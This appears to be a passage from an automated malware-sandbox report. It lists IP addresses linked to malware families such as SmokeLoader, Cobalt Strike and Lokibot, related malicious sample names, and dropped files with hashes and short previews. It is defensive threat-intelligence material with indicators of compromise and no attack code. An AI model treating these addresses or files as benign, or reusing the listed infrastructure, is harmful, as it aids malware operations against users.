                                                                                                                                                                                        • 46.173.214.24
                                                                                                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                        • 46.173.214.24
                                                                                                                                                                                        0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                        • 46.173.214.92
                                                                                                                                                                                        0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                        • 46.173.214.92
                                                                                                                                                                                        9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                        • 46.173.214.92
                                                                                                                                                                                        9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                        • 46.173.214.92
                                                                                                                                                                                        bacon.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                        • 46.173.214.102
                                                                                                                                                                                        UfRKIdsNvD.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                        • 46.173.214.92
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                        • 46.173.214.86
                                                                                                                                                                                        AS-COLOCROSSINGUSPO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144
                                                                                                                                                                                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144
                                                                                                                                                                                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144
                                                                                                                                                                                        miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.210.142.114
                                                                                                                                                                                        9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                        • 172.245.123.11
                                                                                                                                                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.168.33.8
                                                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.168.33.8
                                                                                                                                                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.168.33.8
                                                                                                                                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 107.175.130.16
                                                                                                                                                                                        x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.168.33.8
                                                                                                                                                                                        No context
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        C:\Users\user\AppData\Roaming\icgfugfbestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                          kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                            bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                              invoice727282_PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                  6038732).vbsGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                    cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                                                          3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.943132230425992
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Rmsc5eCfQ0LZTkrjyaVwzuiFcFZ24lO8k:9cQCfrLZTWjKzuiFcFY4lO8k
                                                                                                                                                                                                            MD5:F4DAB18560E24058B91495A19E634BED
                                                                                                                                                                                                            SHA1:49E002117C96ADD48A36433BA2A13C9E00E18542
                                                                                                                                                                                                            SHA-256:DAEEAAD971B0A1F6DBA1F0BEA504AC53D62896604EC1C3594F089D0896EC00B7
                                                                                                                                                                                                            SHA-512:8B5750376ECAE794AE73729FD8AB36CABED4512E54E55E536F97485A590FDCAE558A5EAF522D1CD9D327445D530FEB040D6B1959F18A2E89A349AE5F0C67E011
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.4.5.9.5.5.4.6.9.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.4.5.9.7.0.6.2.6.0.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.4.f.a.f.2.-.2.b.8.7.-.4.6.a.a.-.9.6.5.d.-.4.0.d.d.d.7.d.1.9.f.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.0.1.6.c.5.d.-.a.7.f.f.-.4.3.9.a.-.8.9.e.6.-.5.3.7.e.a.5.f.7.1.2.7.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.e.8.-.0.0.0.1.-.0.0.1.4.-.d.8.b.1.-.5.3.7.6.b.5.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Wed Jan 8 10:09:55 2025, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):57526
                                                                                                                                                                                                            Entropy (8bit):1.5752069011943641
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:QADybE7RGOhO2pxdsNbZDHC8Yav5bozjyImw:5yA7YubshZDHCw5szuId
                                                                                                                                                                                                            MD5:8BCE9A77960B2735044D38DE01BF4FF9
                                                                                                                                                                                                            SHA1:41431D2EC9BDABE37499070CFB9E31E0F61C98D9
                                                                                                                                                                                                            SHA-256:C0B6796121D0AC21E6AC4020B069D8D2237A4EADAA0CAF220D1D77B00920A95D
                                                                                                                                                                                                            SHA-512:1BC536F271C6B7516CE49D19750AE0EF68843D9DAA4DEF5D0E7035BD28A6024B442EAC5A3703F79949DA37ED025832CFDB7049646E02D7723623B23C40B55C0C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........N~g.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T............N~g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8560
                                                                                                                                                                                                            Entropy (8bit):3.6926133028109454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJf1/Q6Y9cIFNgmfqtjbDpD089bmkGqnfhfim:R6lXJ946YG4NgmfqtjbmkG6f9
                                                                                                                                                                                                            MD5:5A49BA177B160AE675DDE2A17E0E3142
                                                                                                                                                                                                            SHA1:3970A15D6430B4C0B7F3822765F0639778739373
                                                                                                                                                                                                            SHA-256:37561A999A806585C02B8E93D2277635C199D5D16A13207E5A300082357F70B9
                                                                                                                                                                                                            SHA-512:D95DC458423EEE6FBFD9F9240CE16D33D01C458EF4CAC005EA45D98572276088480A90EE51D1AFCE5085F0B40346BB88303E2AF552D40A9EF58589E16613B625
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.1.2.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4719
                                                                                                                                                                                                            Entropy (8bit):4.452792573715219
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsaJg771I9LoWpW8VYaYm8M4JYcF/yq85MvNb9Q3Pd:uIjfoI74B7VKJ3TNba3Pd
                                                                                                                                                                                                            MD5:82639DA9F4A438E9D7C4E9714E54F1F2
                                                                                                                                                                                                            SHA1:412254AAE6E4C02C22C931D49E73C98D70404C39
                                                                                                                                                                                                            SHA-256:B40D8E5DCED0675DA385BC61BD6B6829EC49CFD5205AC2F5A1D9B153DDE7FC9A
                                                                                                                                                                                                            SHA-512:F5CFBC4B0E86D18F014465C0BE1F2AD66DCE6339D45DAA5D7A9EBE80BDF34424482653BE0123FE76B3D8446FD1551717DA358DC405AEDBF477127ACF6F7D5783
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666792" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):311
                                                                                                                                                                                                            Entropy (8bit):5.347482639021185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                                                                                                            MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                                                                                                            SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                                                                                                            SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                                                                                                            SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):224763
                                                                                                                                                                                                            Entropy (8bit):5.3949239509459925
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
                                                                                                                                                                                                            MD5:8CCD875893CD23B67D7C61EA735F5C52
                                                                                                                                                                                                            SHA1:6171C7DD4F67A67FFF0CA151C7E9A06104E00DEF
                                                                                                                                                                                                            SHA-256:16328212055D6AA79C45B6624607F74B732B159DB4C6CDF7D8E6835EBDC6E392
                                                                                                                                                                                                            SHA-512:3CEB06944FB1CB3F176E9163F761E3C2D97E72A9E0177F417D4A83E03F4B539FBCB2D7EBE53865A483CACDC8EAF16CE292245AED1CC60C207F7CA038CED07F31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5829
                                                                                                                                                                                                            Entropy (8bit):4.901113710259376
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                            MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                            SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                            SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                            SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1144
                                                                                                                                                                                                            Entropy (8bit):5.290848674040258
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:32gSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKM9rgd:GgSU4xympjmZ9tz4RIoUl8NF9C
                                                                                                                                                                                                            MD5:F262C231D15773CB65C99F7B6AD6A81C
                                                                                                                                                                                                            SHA1:5DE14E5014654D233C869A4CA47BACF3E1120A1D
                                                                                                                                                                                                            SHA-256:2A76444C5964969A6D590232EB13C41FA85F6D4DC94E693593A8681ED2C46581
                                                                                                                                                                                                            SHA-512:23A1D7849A86E9E619D942165F34196D00D7967493BBA5CDE78190F7E2055072F2AB0CD8081739D513FC4197592D621B5DE70FCC6DB80DA5B1BB564430583F9F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\explorer.exe
